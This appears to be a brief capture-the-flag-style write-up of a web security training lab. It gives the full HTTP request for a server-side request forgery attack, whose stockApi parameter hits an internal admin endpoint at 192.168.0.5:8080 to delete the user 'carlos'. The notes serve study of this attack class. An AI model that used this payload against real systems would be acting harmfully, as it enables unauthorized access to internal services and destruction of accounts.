in lab DES we have internal admin panel on 192.168.0.X on port 8080

we bruteforce to find the IP : 192.168.0.5 

and delete carlos with this req:

POST /product/stock HTTP/2
Host: 0a24009103a58d5285cea31d00aa00a3.web-security-academy.net
Cookie: session=NdxS6U62JEdQa0PUJuDt4o8OFhpIBGkV
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://0a24009103a58d5285cea31d00aa00a3.web-security-academy.net/product?productId=13
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://0a24009103a58d5285cea31d00aa00a3.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

stockApi=http://192.168.0.5:8080/admin/delete?username=carlos